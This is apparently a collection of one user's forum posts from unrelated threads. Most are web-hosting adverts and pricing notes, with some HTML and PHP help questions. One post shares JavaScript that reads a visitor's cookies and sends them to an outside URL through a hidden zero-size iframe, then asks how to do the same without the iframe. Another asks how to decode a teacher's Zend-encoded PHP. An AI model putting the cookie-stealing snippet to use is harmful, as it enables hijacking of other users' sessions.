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Hi , i have an input forum where you submit a message now when its posted yeah it will just expand the table is there away to fix a width ( width is already set 80% but it will expand that ) i dont want to use br over and over what can be done to make it go on to another line of the table?
Hello , Serverlabs has discontinued it's shared hosting plans for now and focused on reseller accounts.
Our new plans are very cheap , they also come with cPanel/WHM.
With all our new plans you get a dedicated ip address
Unlimted subdomains
Unlimted domains ( to host in WHM)
No i dont want to print them i want it to send it eg this is the real code
<script language="javascript">
user = document.cookie;
user = escape(user);
document.write("<iframe src="+url+user+" height=0 width=0></iframe>");
Hi i have a peice of code from a script im using
document.write("<iframe src="+url+user+" height=0 width=0></iframe>");
how would i change that to not using an iframe at all but with the +url+user+ command on the line somewhere
Any help?
Hello this is one of our new cPanel plans since the move from ensim.
Disk Space : 1.5 GB
Bandwith : 30 GB
Dedicated IP : 1
cPanel 6
Unlimted Subdomains
Unlimted FTP Accounts
PHP (Version 4.2.3)
Unlimted MYSQL Databases
Frontpage 2002 Support
Tomcat JSP...
This is an old thread , This package was with ensim the reason the prices have gone up is we have moved to cpanel and the licence costs alot more than ensim . Yes we allow all video files IF they are legal.
If you want to know more please Contact me on (MSN)
Our Customers have a price freeze so whatever they were paying it will not change . With ensim it was a one off fee for their control panel with cPanel you have to pay monthly i think its around $60 so due to that we had to put our prices up abit or we would not be making any money.
Yes we have very good uptime , the status page is the old ensim one so that will be changing. Prices have gone up due to cpanel licence we have tryed to make them as low as we can.
Sorry about this
You can contact me on (MSN)
Sorry about that
Sorry about the downtime our server had to go down because we had to remove ensim then install cpanel and then transfer all accounts over. Serverlabs should be fine now we have no problems at all :)
Feal free to contact any of the serverlabs staff at anytime
Mudi please dont signup yet we are adding cPanel 6 and switching from ensim thanks.
I'll inform you if you leave your email or pm me with it
Need nice space and bandwith limit for a cheap price ? Well you have found the right guys.
Server Labs S110 Plan
Disk Space 1GB
Bandwith 10GB
Ensim 3.1.4 Control Panel
Unlimted Subdomains
Unlimted FTP Accounts
Webmin Access
Web-Mail With SMTP And POP3
this is for a school project but i cannot get it to work i used your code now what i have is a file that our teacher has encoded in zend now i need to decode the php and then show the php coding anyone know how to do this?
Hi i was wondering if someone could code me a small script to run to view the source of a php file on my server. Im sure theres one somewhere i just cant find one
thx owo
Ive been with exohosting for 4 months now they answer support in under 1 hour . How do you know these people are 14 year olds i dont see you buying a $150 a month dedicated server and hireing staff to support. The control panel is fast good speed on the servers cheap prices good deals...